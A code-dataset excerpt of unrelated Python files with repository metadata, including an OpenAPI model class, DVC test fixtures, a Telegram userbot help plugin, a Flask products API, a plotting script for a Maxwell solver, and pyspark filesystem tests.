        :rtype: OneOfCustomFluidBCEddyViscosity
        """
        return self._eddy_viscosity
    @eddy_viscosity.setter
    def eddy_viscosity(self, eddy_viscosity):
        """Sets the eddy_viscosity of this OneOfConvectiveHeatTransferBoundaryConditions.
        :param eddy_viscosity: The eddy_viscosity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :type: OneOfCustomFluidBCEddyViscosity
        """
        self._eddy_viscosity = eddy_viscosity
    # Generated accessors for compressible/diffusivity model fields; values are
    # stored verbatim with no validation.
    @property
    def eddy_viscosity_compressible(self):
        """Gets the eddy_viscosity_compressible of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :return: The eddy_viscosity_compressible of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :rtype: OneOfCustomFluidBCEddyViscosityCompressible
        """
        return self._eddy_viscosity_compressible
    @eddy_viscosity_compressible.setter
    def eddy_viscosity_compressible(self, eddy_viscosity_compressible):
        """Sets the eddy_viscosity_compressible of this OneOfConvectiveHeatTransferBoundaryConditions.
        :param eddy_viscosity_compressible: The eddy_viscosity_compressible of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :type: OneOfCustomFluidBCEddyViscosityCompressible
        """
        self._eddy_viscosity_compressible = eddy_viscosity_compressible
    @property
    def nu_tilda(self):
        """Gets the nu_tilda of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :return: The nu_tilda of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :rtype: OneOfCustomFluidBCNuTilda
        """
        return self._nu_tilda
    @nu_tilda.setter
    def nu_tilda(self, nu_tilda):
        """Sets the nu_tilda of this OneOfConvectiveHeatTransferBoundaryConditions.
        :param nu_tilda: The nu_tilda of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :type: OneOfCustomFluidBCNuTilda
        """
        self._nu_tilda = nu_tilda
    @property
    def turbulent_thermal_diffusivity(self):
        """Gets the turbulent_thermal_diffusivity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :return: The turbulent_thermal_diffusivity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :rtype: OneOfCustomFluidBCTurbulentThermalDiffusivity
        """
        return self._turbulent_thermal_diffusivity
    @turbulent_thermal_diffusivity.setter
    def turbulent_thermal_diffusivity(self, turbulent_thermal_diffusivity):
        """Sets the turbulent_thermal_diffusivity of this OneOfConvectiveHeatTransferBoundaryConditions.
        :param turbulent_thermal_diffusivity: The turbulent_thermal_diffusivity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :type: OneOfCustomFluidBCTurbulentThermalDiffusivity
        """
        self._turbulent_thermal_diffusivity = turbulent_thermal_diffusivity
    @property
    def turbulent_thermal_diffusivity_compressible(self):
        """Gets the turbulent_thermal_diffusivity_compressible of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :return: The turbulent_thermal_diffusivity_compressible of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :rtype: OneOfCustomFluidBCTurbulentThermalDiffusivityCompressible
        """
        return self._turbulent_thermal_diffusivity_compressible
    @turbulent_thermal_diffusivity_compressible.setter
    def turbulent_thermal_diffusivity_compressible(self, turbulent_thermal_diffusivity_compressible):
        """Sets the turbulent_thermal_diffusivity_compressible of this OneOfConvectiveHeatTransferBoundaryConditions.
        :param turbulent_thermal_diffusivity_compressible: The turbulent_thermal_diffusivity_compressible of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :type: OneOfCustomFluidBCTurbulentThermalDiffusivityCompressible
        """
        self._turbulent_thermal_diffusivity_compressible = turbulent_thermal_diffusivity_compressible
    @property
    def turbulent_dynamic_viscosity(self):
        """Gets the turbulent_dynamic_viscosity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :return: The turbulent_dynamic_viscosity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :rtype: OneOfCustomFluidBCTurbulentDynamicViscosity
        """
        return self._turbulent_dynamic_viscosity
    @turbulent_dynamic_viscosity.setter
    def turbulent_dynamic_viscosity(self, turbulent_dynamic_viscosity):
        """Sets the turbulent_dynamic_viscosity of this OneOfConvectiveHeatTransferBoundaryConditions.
        :param turbulent_dynamic_viscosity: The turbulent_dynamic_viscosity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :type: OneOfCustomFluidBCTurbulentDynamicViscosity
        """
        self._turbulent_dynamic_viscosity = turbulent_dynamic_viscosity
    def get_real_child_model(self, data):
        """Returns the real base class specified by the discriminator"""
        # Map the discriminator attribute name to its wire (JSON) key, read that
        # key from the payload, then look up the concrete model class.
        discriminator_key = self.attribute_map[self.discriminator]
        discriminator_value = data[discriminator_key]
        # .get() returns None for unknown discriminator values.
        return self.discriminator_value_class_map.get(discriminator_value)
    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                # Recursively serialize list elements that are themselves models.
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                # Nested model: serialize it in turn.
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                # Serialize dict values that are models; keep other items as-is.
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                # Plain value: copy through unchanged.
                result[attr] = value
        return result
    def to_str(self):
        """Returns the string representation of the model"""
        # Pretty-print the recursive dict form produced by to_dict().
        return pprint.pformat(self.to_dict())
    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()
    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, OneOfConvectiveHeatTransferBoundaryConditions):
            return False
        # Structural equality: compare the serialized dict representations.
        return self.to_dict() == other.to_dict()
    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        if not isinstance(other, OneOfConvectiveHeatTransferBoundaryConditions):
            return True
        return self.to_dict() != other.to_dict()
| 40.695418 | 693 | 0.722811 |
b2df8f08997aff9e5af9a781eb6dfdc38b377096 | 441 | py | Python | tests/remotes/local.py | sahilbhosale63/dvc | 999c9e188801f971b75f51ca84f5bad533cb462c | [
"Apache-2.0"
] | null | null | null | tests/remotes/local.py | sahilbhosale63/dvc | 999c9e188801f971b75f51ca84f5bad533cb462c | [
"Apache-2.0"
] | null | null | null | tests/remotes/local.py | sahilbhosale63/dvc | 999c9e188801f971b75f51ca84f5bad533cb462c | [
"Apache-2.0"
] | null | null | null | import pytest
from tests.basic_env import TestDvc
from .base import Base
class Local(Base):
    # Local-filesystem variant of the remote-storage test helper.
    @staticmethod
    def get_storagepath():
        # Fresh temporary directory per call, created via the test environment.
        return TestDvc.mkdtemp()
    @staticmethod
    def get_url():
        # For a local "remote" the URL is simply the storage path itself.
        return Local.get_storagepath()
@pytest.fixture
def local_cloud():
    # Yields a fresh Local() helper; no explicit teardown is needed.
    yield Local()
@pytest.fixture
def local_remote(tmp_dir, dvc, local_cloud):
    # Attaches the local cloud's config as a remote on the temp repo
    # (presumably as the default remote — confirm in tmp_dir.add_remote),
    # then hands the same helper object to the test.
    tmp_dir.add_remote(config=local_cloud.config)
    yield local_cloud
| 16.333333 | 49 | 0.714286 |
5a47c6982cb27e8cfc468e2c702c4c85a85deb3a | 2,870 | py | Python | userbot/plugins/_helper.py | kwkwkkw/ironbot | 1b7e6def5f3a6af030317b9405ebda7db711fcee | [
"MIT"
] | 1 | 2020-09-16T09:55:12.000Z | 2020-09-16T09:55:12.000Z | userbot/plugins/_helper.py | kwkwkkw/ironbot | 1b7e6def5f3a6af030317b9405ebda7db711fcee | [
"MIT"
] | null | null | null | userbot/plugins/_helper.py | kwkwkkw/ironbot | 1b7e6def5f3a6af030317b9405ebda7db711fcee | [
"MIT"
] | 1 | 2021-07-06T13:44:41.000Z | 2021-07-06T13:44:41.000Z | from userbot import CMD_LIST
import io
import sys

from telethon import events, functions, __version__

from userbot.utils import admin_cmd
@command(pattern="^.help ?(.*)")
async def cmd_list(event):
    """Handle `.help [plugin|text]` and reply with the command list.

    Three modes, chosen from the captured argument:
      * no helper-bot username configured, or arg == "text": build the full
        command list from CMD_LIST and post it (as a document when it exceeds
        the message-length cutoff),
      * arg names a plugin in CMD_LIST: list only that plugin's commands,
      * otherwise: delegate to the helper bot through an inline query.
    """
    # Only react to command-prefixed text (".help"), not ordinary messages.
    if not event.text[0].isalpha() and event.text[0] not in ("/", "#", "@", "!"):
        tgbotusername = Var.TG_BOT_USER_NAME_BF_HER
        input_str = event.pattern_match.group(1)
        if tgbotusername is None or input_str == "text":
            string = ""
            for i in CMD_LIST:
                string += "😎 " + i + "\n"
                for iter_list in CMD_LIST[i]:
                    string += "Ironbot`" + str(iter_list) + "`"
                    string += "\n"
                string += "\n"
            if len(string) > 9999:
                # Too long for a single message: send it as a text document.
                with io.BytesIO(str.encode(string)) as out_file:
                    out_file.name = "cmd.txt"
                    await bot.send_file(
                        event.chat_id,
                        out_file,
                        force_document=True,
                        allow_cache=False,
                        caption="**COMMANDS**",
                        # BUG FIX: `reply_to_id` was never defined and raised
                        # NameError on this path; reply to the same message the
                        # .help command itself replied to.
                        reply_to=event.reply_to_msg_id
                    )
                await event.delete()
            else:
                await event.edit(string)
        elif input_str:
            if input_str in CMD_LIST:
                string = "Commands found in {}:".format(input_str)
                for i in CMD_LIST[input_str]:
                    string += " " + i
                string += "\n"
                await event.edit(string)
            else:
                await event.edit(input_str + " is not a valid plugin!")
        else:
            help_string = """Userbot Mod Ironbot..\n`.help / .help <module name> untuk melihat command`"""
            results = await bot.inline_query(  # pylint:disable=E0602
                tgbotusername,
                help_string
            )
            await results[0].click(
                event.chat_id,
                reply_to=event.reply_to_msg_id,
                hide_via=True
            )
            await event.delete()
@borg.on(admin_cmd(pattern="syntax (.*)"))
async def _(event):
    """Reply with docstring-based syntax help for a single loaded plugin."""
    if event.fwd_from:
        return
    name = event.pattern_match.group(1)
    if name not in borg._plugins:
        reply = "Enter valid **Plugin** name.\nDo `.exec ls stdplugins` or `.helpme` to get list of valid plugin names."
    else:
        doc = borg._plugins[name].__doc__
        if doc:
            unload_hint = f"Use `.unload {name}` to remove this plugin.\n"
            reply = f"Syntax for plugin **{name}**:\n\n{doc}\n{unload_hint}"
        else:
            reply = f"No DOCSTRING has been setup for {name} plugin."
    await event.edit(reply)
| 40.422535 | 128 | 0.523693 |
143ac595c4f7d1f2c5715f0e156253266c333cad | 2,078 | py | Python | app.py | coffescript/api-rest-flask | 3e844f8a13706b6d23a4def36147d3f26ce1981b | [
"MIT"
] | 1 | 2019-11-18T07:51:54.000Z | 2019-11-18T07:51:54.000Z | app.py | coffescript/api-rest-flask | 3e844f8a13706b6d23a4def36147d3f26ce1981b | [
"MIT"
] | null | null | null | app.py | coffescript/api-rest-flask | 3e844f8a13706b6d23a4def36147d3f26ce1981b | [
"MIT"
] | null | null | null | #flask
from flask import Flask, jsonify, request
app = Flask(__name__)
from products import Products
@app.route('/ping')
def ping():
    """Liveness probe: always answers with a static pong payload."""
    payload = {'message': 'pong!'}
    return jsonify(payload)
@app.route('/products', methods=['GET'])
def getProducts():
    """Return the full in-memory product list."""
    response = {"products": Products, "message": "Products list"}
    return jsonify(response)
@app.route('/products/<string:product_name>')
def getProduct(product_name):
    """Return the first product whose name matches `product_name`.

    FIX: a miss previously returned HTTP 200 with an error body, which
    misleads API clients; it now returns 404.
    """
    matches = [product for product in Products if product['name'] == product_name]
    if matches:
        return jsonify({"product": matches[0]})
    return jsonify({"message": "Product not found.:("}), 404
@app.route('/products', methods=['POST'])
def addProduct():
    """Create a product from the JSON request body and return the list.

    FIX: a missing/empty body or absent field previously crashed with an
    unhandled KeyError/TypeError; it now responds 400 with the field names.
    """
    body = request.json or {}
    missing = [field for field in ("name", "price", "quantity") if field not in body]
    if missing:
        return jsonify({"message": "Missing fields: " + ", ".join(missing)}), 400
    new_product = {
        "name": body['name'],
        "price": body['price'],
        "quantity": body['quantity']
    }
    Products.append(new_product)
    return jsonify({"message": "Product Added Successfully", "products": Products})
@app.route('/products/<string:product_name>', methods=['PUT'])
def editProduct(product_name):
    """Update an existing product in place from the JSON request body.

    FIX: responds 404 (instead of 200) when no product matches, and 400
    (instead of crashing) when required fields are missing from the body.
    """
    matches = [product for product in Products if product['name'] == product_name]
    if not matches:
        return jsonify({
            "message": "Product not Found. :("
        }), 404
    body = request.json or {}
    missing = [field for field in ("name", "price", "quantity") if field not in body]
    if missing:
        return jsonify({"message": "Missing fields: " + ", ".join(missing)}), 400
    product = matches[0]
    product['name'] = body['name']
    product['price'] = body['price']
    product['quantity'] = body['quantity']
    return jsonify({
        "message": "Product Updated Successfully",
        "product_updated": product,
        "products": Products
    })
@app.route('/products/<string:product_name>', methods=['DELETE'])
def deleteProduct(product_name):
    """Delete a product by name.

    FIX: a miss previously returned HTTP 200; it now returns 404.
    """
    matches = [product for product in Products if product['name'] == product_name]
    if matches:
        Products.remove(matches[0])
        return jsonify({
            "message": "Product Deleted. :(",
            "products": Products
        })
    return jsonify({"message": "Product not found. :("}), 404
if __name__ == '__main__':
    # Development server only (debug reloader enabled); use a WSGI server
    # such as gunicorn in production.
    app.run(debug=True, port=4000)
| 32.984127 | 88 | 0.639557 |
32b5360b83fa5a09241c3e328d4a55678f74f6b0 | 5,125 | py | Python | sims-2/dg-maxwell/s5/plot-sol.py | ammarhakim/ammar-simjournal | 85b64ddc9556f01a4fab37977864a7d878eac637 | [
"MIT",
"Unlicense"
] | 1 | 2019-12-19T16:21:13.000Z | 2019-12-19T16:21:13.000Z | sims-2/dg-maxwell/s5/plot-sol.py | ammarhakim/ammar-simjournal | 85b64ddc9556f01a4fab37977864a7d878eac637 | [
"MIT",
"Unlicense"
] | null | null | null | sims-2/dg-maxwell/s5/plot-sol.py | ammarhakim/ammar-simjournal | 85b64ddc9556f01a4fab37977864a7d878eac637 | [
"MIT",
"Unlicense"
] | 2 | 2020-01-08T06:23:33.000Z | 2020-01-08T07:06:50.000Z | import pylab
import tables
import math
import numpy
import pylab
import numpy
from matplotlib import rcParams
import matplotlib.pyplot as plt
# customization for figure
rcParams['lines.linewidth'] = 2
rcParams['font.size'] = 18
#rcParams['xtick.major.size'] = 8 # default is 4
#rcParams['xtick.major.width'] = 3 # default is 0.5
#rcParams['ytick.major.size'] = 8 # default is 4
#rcParams['ytick.major.width'] = 3 # default is 0.5
rcParams['figure.facecolor'] = 'white'
#rcParams['figure.subplot.bottom'] = 0.125
#rcParams['figure.subplot.right'] = 0.85 # keep labels/ticks of colobar in figure
rcParams['image.interpolation'] = 'none'
rcParams['image.origin'] = 'lower'
rcParams['contour.negative_linestyle'] = 'solid'
#rcParams['savefig.bbox'] = 'tight'
# Math/LaTex fonts:
# http://matplotlib.org/users/mathtext.html
# http://matplotlib.org/users/usetex.html
# Example: xlabel(r'$t \cdot l / V_{A,bc}$')
rcParams['mathtext.default'] = 'regular' # match the font used for regular text
def getRaw(q, component, numEqns, nNodes):
    """Extract one equation component at every node from an interleaved field.

    q stores, per cell, nNodes blocks of numEqns values along its last axis;
    node n's value for `component` lives at index component + n*numEqns.

    FIX: `numpy.float` was a deprecated alias for the builtin `float` and was
    removed in NumPy 1.24, making this raise AttributeError; use `float`
    directly (same float64 dtype).
    """
    rawData = numpy.zeros((q.shape[0], q.shape[1], nNodes), float)
    for n in range(nNodes):
        rawData[:,:,n] = q[:,:,component+n*numEqns]
    return rawData
def evalSum(coeff, fields):
    """Return the linear combination sum_i coeff[i] * fields[i].

    The accumulator starts as 0.0 * fields[0], so it inherits the shape of
    the field arrays (or stays a scalar for scalar fields).
    """
    total = 0.0 * fields[0]
    for i, weight in enumerate(coeff):
        total = total + weight * fields[i]
    return total
def projectOnFinerGrid_f(Xc, Yc, q):
    """Project an 8-node-per-cell field onto a 3x3-subsampled plotting grid.

    Xc, Yc are cell-center coordinates; q holds 8 nodal values per cell in
    its last axis. Each cell is refined into a 3x3 patch of points, and the
    value at each of the 9 sub-points is a fixed linear combination (c1..c9)
    of the 8 nodal values. Returns (XXn, YYn, qn): node-coordinate meshes
    and the refined data.
    NOTE(review): the c1..c9 coefficient sets are hard-coded interpolation
    weights for this particular 8-node basis — presumably derived offline;
    do not edit without re-deriving them.
    """
    dx = Xc[1]-Xc[0]
    dy = Yc[1]-Yc[0]
    nx = Xc.shape[0]
    ny = Yc.shape[0]
    # mesh coordinates
    Xn = pylab.linspace(Xc[0]-0.5*dx, Xc[-1]+0.5*dx, 3*nx+1) # one more
    Yn = pylab.linspace(Yc[0]-0.5*dy, Yc[-1]+0.5*dy, 3*ny+1) # one more
    XXn, YYn = pylab.meshgrid(Xn, Yn)
    # data
    qn = pylab.zeros((3*Xc.shape[0], 3*Yc.shape[0]), float)
    v1 = q[:,:,0]
    v2 = q[:,:,1]
    v3 = q[:,:,2]
    v4 = q[:,:,3]
    v5 = q[:,:,4]
    v6 = q[:,:,5]
    v7 = q[:,:,6]
    v8 = q[:,:,7]
    vList = [v1,v2,v3,v4,v5,v6,v7,v8]
    # node 1
    c1 = [.2314814814814815,-.1388888888888889,-.06481481481481481,-.1388888888888889,0.462962962962963,.09259259259259259,.09259259259259259,0.462962962962963]
    qn[0:3*nx:3, 0:3*ny:3] = evalSum(c1, vList)
    # node 2
    c2 = [-.1388888888888889,-.1388888888888889,-.1388888888888889,-.1388888888888889,.8333333333333334,.2777777777777778,.1666666666666667,.2777777777777778]
    qn[1:3*nx:3, 0:3*ny:3] = evalSum(c2, vList)
    # node 3
    c3 = [-.1388888888888889,.2314814814814815,-.1388888888888889,-.06481481481481481,0.462962962962963,0.462962962962963,.09259259259259259,.09259259259259259]
    qn[2:3*nx:3, 0:3*ny:3] = evalSum(c3, vList)
    # node 4
    c4 = [-.1388888888888889,-.1388888888888889,-.1388888888888889,-.1388888888888889,.2777777777777778,.1666666666666667,.2777777777777778,.8333333333333334]
    qn[0:3*nx:3, 1:3*ny:3] = evalSum(c4, vList)
    # node 5
    c5 = [-0.25,-0.25,-0.25,-0.25,0.5,0.5,0.5,0.5]
    qn[1:3*nx:3, 1:3*ny:3] = evalSum(c5, vList)
    # node 6
    c6 = [-.1388888888888889,-.1388888888888889,-.1388888888888889,-.1388888888888889,.2777777777777778,.8333333333333334,.2777777777777778,.1666666666666667]
    qn[2:3*nx:3, 1:3*ny:3] = evalSum(c6, vList)
    # node 7
    c7 = [-.1388888888888889,-.06481481481481481,-.1388888888888889,.2314814814814815,.09259259259259259,.09259259259259259,0.462962962962963,0.462962962962963]
    qn[0:3*nx:3, 2:3*ny:3] = evalSum(c7, vList)
    # node 8
    c8 = [-.1388888888888889,-.1388888888888889,-.1388888888888889,-.1388888888888889,.1666666666666667,.2777777777777778,.8333333333333334,.2777777777777778]
    qn[1:3*nx:3, 2:3*ny:3] = evalSum(c8, vList)
    # node 9
    c9 = [-.06481481481481481,-.1388888888888889,.2314814814814815,-.1388888888888889,.09259259259259259,0.462962962962963,0.462962962962963,.09259259259259259]
    qn[2:3*nx:3, 2:3*ny:3] = evalSum(c9, vList)
    return XXn, YYn, qn
# Load the final-time solution and build the cell-center grid from the HDF5
# attributes. NOTE: tables.openFile is the legacy PyTables (Python 2 era) API.
fh = tables.openFile("s5-dg-maxwell_q_1.h5")
grid = fh.root.StructGrid
lower = grid._v_attrs.vsLowerBounds
upper = grid._v_attrs.vsUpperBounds
cells = grid._v_attrs.vsNumCells
dx = (upper[0]-lower[0])/cells[0]
dy = (upper[1]-lower[1])/cells[1]
Xc = pylab.linspace(lower[0]+0.5*dx, upper[0]-0.5*dx, cells[0])
Yc = pylab.linspace(lower[1]+0.5*dy, upper[1]-0.5*dy, cells[1])
# get final solution
# Component 2 of an 8-equation, 8-node field (see getRaw's call signature).
q1 = getRaw(fh.root.StructGridField, 2, 8, 8)
Xn, Yn, qn_1 = projectOnFinerGrid_f(Xc, Yc, q1)
# get intial solution
fh = tables.openFile("s5-dg-maxwell_q_0.h5")
q0 = getRaw(fh.root.StructGridField, 2, 8, 8)
Xn, Yn, qn_0 = projectOnFinerGrid_f(Xc, Yc, q0)
nx, ny = Xn.shape[0], Yn.shape[0]
# make plot
pylab.figure(1)
pylab.pcolormesh(Xn, Yn, pylab.transpose(qn_1))
pylab.axis('tight')
pylab.savefig('s5-dg-maxwell-Ez.png')
def calcAverage(fld):
    """Return the per-cell average from the 8 nodal values.

    Applies fixed weights -1/3 to nodes 0-3 and 4/3 to nodes 4-7, then sums
    over the node axis.
    """
    third = 1.0/3.0
    wt = pylab.array(4*[-third] + 4*[4.0*third])
    return (fld[:,:,0:8]*wt).sum(axis=-1)
# compute error
# Sum of |final - initial| cell averages, scaled by the quarter cell volume.
q0avg = calcAverage(q0)
q1avg = calcAverage(q1)
vol = dx*dy/4.0
errAvg = vol*numpy.abs(q1avg-q0avg).sum()
# Python 2 print statement — this script predates Python 3.
print dx, errAvg
pylab.show()
| 33.940397 | 160 | 0.654244 |
5eb09a749fd8fe8df7170e95b9dd852cb5ae5854 | 225 | py | Python | mattslib/__init__.py | greenmachine1902/NEAT | 5bfab1e38ccebb6d40ef46c5ea2f7f482b5c6be8 | [
"BSD-3-Clause"
] | null | null | null | mattslib/__init__.py | greenmachine1902/NEAT | 5bfab1e38ccebb6d40ef46c5ea2f7f482b5c6be8 | [
"BSD-3-Clause"
] | null | null | null | mattslib/__init__.py | greenmachine1902/NEAT | 5bfab1e38ccebb6d40ef46c5ea2f7f482b5c6be8 | [
"BSD-3-Clause"
] | null | null | null | from .list import condense, findMaxMin
from . import dict
from . import file
from . import math_util
from . import pygame
# 'list' resolves after the `from .list import ...` at the top of this module
# because importing a submodule binds it as a package attribute.
# FIX: 'pygame' was imported above but missing from __all__, so
# `from mattslib import *` silently skipped it; keep the lists in sync.
__all__ = ['dict', 'file', 'list', 'math_util', 'pygame', 'condense', 'findMaxMin']
__version__ = '1.2'
| 25 | 74 | 0.684444 |
f9342bd4a0dff29830985194be9cb0f0ba672e9e | 807 | py | Python | src/Canonical/constants.py | mwjjeong/SpliceAI-test | 4050038e3c3863ba3d58b311d895ef48b7be7af6 | [
"Zlib"
] | null | null | null | src/Canonical/constants.py | mwjjeong/SpliceAI-test | 4050038e3c3863ba3d58b311d895ef48b7be7af6 | [
"Zlib"
] | null | null | null | src/Canonical/constants.py | mwjjeong/SpliceAI-test | 4050038e3c3863ba3d58b311d895ef48b7be7af6 | [
"Zlib"
] | 2 | 2020-05-20T03:48:07.000Z | 2021-12-18T22:01:17.000Z | CL_max=10000
# Maximum nucleotide context length (CL_max/2 on either side of the
# position of interest)
# CL_max should be an even number
SL=5000
# Sequence length of SpliceAIs (SL+CL will be the input length and
# SL will be the output length)
# directory settings
# NOTE(review): absolute, host-specific cluster paths — these must be edited
# (or moved to environment/config) before running on another machine.
PROJECT_DIR='/extdata4/baeklab/minwoo/projects/SpliceAI-test'
DATA_DIR='/extdata4/baeklab/minwoo/projects/SpliceAI-test/data'
RESULT_DIR='/extdata4/baeklab/minwoo/projects/SpliceAI-test/results'
MODEL_DIR='/extdata4/baeklab/minwoo/projects/SpliceAI-test/spliceai/models'
# data path settings
REF_GENOME='/extdata6/Minwoo/data/ref-genome/hg19/hg19.fa'
SPLICE_TABLE='/extdata4/baeklab/minwoo/projects/SpliceAI-test/data/gencode_merge_dataset.txt'
SEQUENCE='/extdata4/baeklab/minwoo/projects/SpliceAI-test/data/gencode_merge_sequence.txt'
| 40.35 | 93 | 0.812887 |
ec5dcd396e1d3a07df7eb9fac6f34938d7bece5a | 3,659 | py | Python | tests/test_filesystem.py | robtucker/pyspark-tooling | 946773975b4069c448dca1590eff3ae77a25be98 | [
"MIT"
] | null | null | null | tests/test_filesystem.py | robtucker/pyspark-tooling | 946773975b4069c448dca1590eff3ae77a25be98 | [
"MIT"
] | null | null | null | tests/test_filesystem.py | robtucker/pyspark-tooling | 946773975b4069c448dca1590eff3ae77a25be98 | [
"MIT"
] | null | null | null | import os
import uuid
import pandas as pd
from zipfile import ZipFile
from pyspark_tooling.filesystem import EmrFilesystem
from tests import base
CSV_DATA = """
foo,bar
a,1
b,2
c,3
"""
YAML_DATA = """
foo:
- a: 1
- b: 2
"""
SQL_DATA = """
SELECT *
FROM my_table
WHERE my_condition IS NOT NULL
"""
class TestFilesystem(base.BaseTest):
    """Test loading data from emr.

    Local-mode cases write a file to ./data and read it back through
    EmrFilesystem; zip cases package the payload into an archive first.
    """

    def test_load_local_yaml(self):
        # YAML files should come back parsed into Python structures.
        filepath = f"./data/{str(uuid.uuid4())}/local.yaml"
        self.put_local(filepath, YAML_DATA)
        fs = EmrFilesystem(None, is_local=True)
        actual = fs.open(filepath)
        expected = {"foo": [{"a": 1}, {"b": 2}]}
        assert actual == expected
        self.wipe_folder("./data")

    def test_load_local_csv(self):
        # CSV files should come back as a pandas DataFrame.
        filepath = f"./data/{str(uuid.uuid4())}/local.csv"
        self.put_local(filepath, CSV_DATA)
        fs = EmrFilesystem(None, is_local=True)
        actual = fs.open(filepath)
        tuples = [tuple(x) for x in actual.to_numpy()]
        expected = [("a", 1), ("b", 2), ("c", 3)]
        assert tuples == expected
        self.wipe_folder("./data")

    def test_load_local_txt(self):
        # Plain text files should round-trip unchanged.
        filepath = f"./data/{str(uuid.uuid4())}/local.txt"
        data = str(uuid.uuid4())
        self.put_local(filepath, data)
        fs = EmrFilesystem(None, is_local=True)
        actual = fs.open(filepath)
        assert actual == data
        self.wipe_folder("./data")

    def test_load_zip_csv(self):
        actual = self.run_zip_test("./data", "random.csv", CSV_DATA)
        assert isinstance(actual, pd.core.frame.DataFrame)
        tuples = [tuple(x) for x in actual.to_numpy()]
        expected = [("a", 1), ("b", 2), ("c", 3)]
        assert tuples == expected

    def test_load_zip_yaml(self):
        actual = self.run_zip_test("./data", "random.yaml", YAML_DATA)
        assert isinstance(actual, dict)
        expected = {"foo": [{"a": 1}, {"b": 2}]}
        assert actual == expected

    def test_load_zip_sql(self):
        # SQL payloads are returned as raw text.
        actual = self.run_zip_test("./data", "random.sql", SQL_DATA)
        assert isinstance(actual, str)
        assert actual == SQL_DATA

    def test_load_zip_txt(self):
        data = f"{str(uuid.uuid4())}\n{str(uuid.uuid4())}"
        actual = self.run_zip_test("./data", "random.txt", data)
        assert isinstance(actual, str)
        assert actual == data

    def run_zip_test(self, bucket, filename: str, data):
        """Zip `data` under `filename`, read it back via EmrFilesystem, return the result.

        FIX: the archive member path previously embedded a literal placeholder
        instead of `filename`, so the parameter was unused and the
        extension-driven parsing in EmrFilesystem.open never saw the requested
        file type.
        """
        zip_folder = f"zip_test/{str(uuid.uuid4())}"
        zip_directory = os.path.join(bucket, zip_folder)
        filepath = f"{str(uuid.uuid4())}/{filename}"
        local_filepath = os.path.join(zip_folder, filepath)
        zip_filepath = os.path.join(zip_directory, "result.zip")
        self.put_local(os.path.join(bucket, local_filepath), data)
        # Context manager guarantees the archive is flushed and closed even on
        # failure (the original leaked the handle if write() raised).
        with ZipFile(zip_filepath, mode="w") as z:
            z.write(os.path.join(bucket, local_filepath), arcname=filepath)
        fs = EmrFilesystem(zipped_code_path=zip_filepath, is_local=False)
        actual = fs.open(filepath)
        self.wipe_folder(bucket)
        return actual

    def put_local(self, filepath: str, data):
        """Save a file locally, creating parent directories as needed."""
        directory = os.path.dirname(filepath)
        if not os.path.exists(directory):
            os.makedirs(directory)
        with open(filepath, "w") as f:
            f.write(data)
| 26.514493 | 73 | 0.600437 |
f04000af79bd5b56d7a115679cb95b264c253ec9 | 1,057 | py | Python | ote_sdk/ote_sdk/usecases/evaluation/performance_provider_interface.py | vyashina/training_extensions | e7aa33af94a1f8004d3ea2df259d99234dfca046 | [
"Apache-2.0"
] | null | null | null | ote_sdk/ote_sdk/usecases/evaluation/performance_provider_interface.py | vyashina/training_extensions | e7aa33af94a1f8004d3ea2df259d99234dfca046 | [
"Apache-2.0"
] | null | null | null | ote_sdk/ote_sdk/usecases/evaluation/performance_provider_interface.py | vyashina/training_extensions | e7aa33af94a1f8004d3ea2df259d99234dfca046 | [
"Apache-2.0"
] | null | null | null | """ This module contains interface for performance providers. """
# INTEL CONFIDENTIAL
#
# Copyright (C) 2021 Intel Corporation
#
# This software and the related documents are Intel copyrighted materials, and
# your use of them is governed by the express license under which they were provided to
# you ("License"). Unless the License provides otherwise, you may not use, modify, copy,
# publish, distribute, disclose or transmit this software or the related documents
# without Intel's prior written permission.
#
# This software and the related documents are provided as is,
# with no express or implied warranties, other than those that are expressly stated
# in the License.
import abc
from ote_sdk.entities.metrics import Performance
class IPerformanceProvider(metaclass=abc.ABCMeta):
    """
    Interface for objects that can compute and report a Performance metric.
    TODO: subject for refactoring.
    """
    @abc.abstractmethod
    def get_performance(self) -> Performance:
        """
        Returns the computed performance.
        """
        # Abstract: concrete providers must override; the raise only guards
        # direct calls through super().
        raise NotImplementedError
| 30.2 | 88 | 0.741722 |
2421211bee3d36f0d538abfb5dd8e805e5c70e60 | 16,243 | py | Python | geopandas/io/arrow.py | ameier3/geopandas | 0435306e74c71b870c06ea4e26dc4d4ee85ea9d9 | [
"BSD-3-Clause"
] | 1 | 2022-01-29T11:04:05.000Z | 2022-01-29T11:04:05.000Z | geopandas/io/arrow.py | ameier3/geopandas | 0435306e74c71b870c06ea4e26dc4d4ee85ea9d9 | [
"BSD-3-Clause"
] | null | null | null | geopandas/io/arrow.py | ameier3/geopandas | 0435306e74c71b870c06ea4e26dc4d4ee85ea9d9 | [
"BSD-3-Clause"
] | null | null | null | from packaging.version import Version
import json
import warnings
from pandas import DataFrame
from geopandas._compat import import_optional_dependency
from geopandas.array import from_wkb
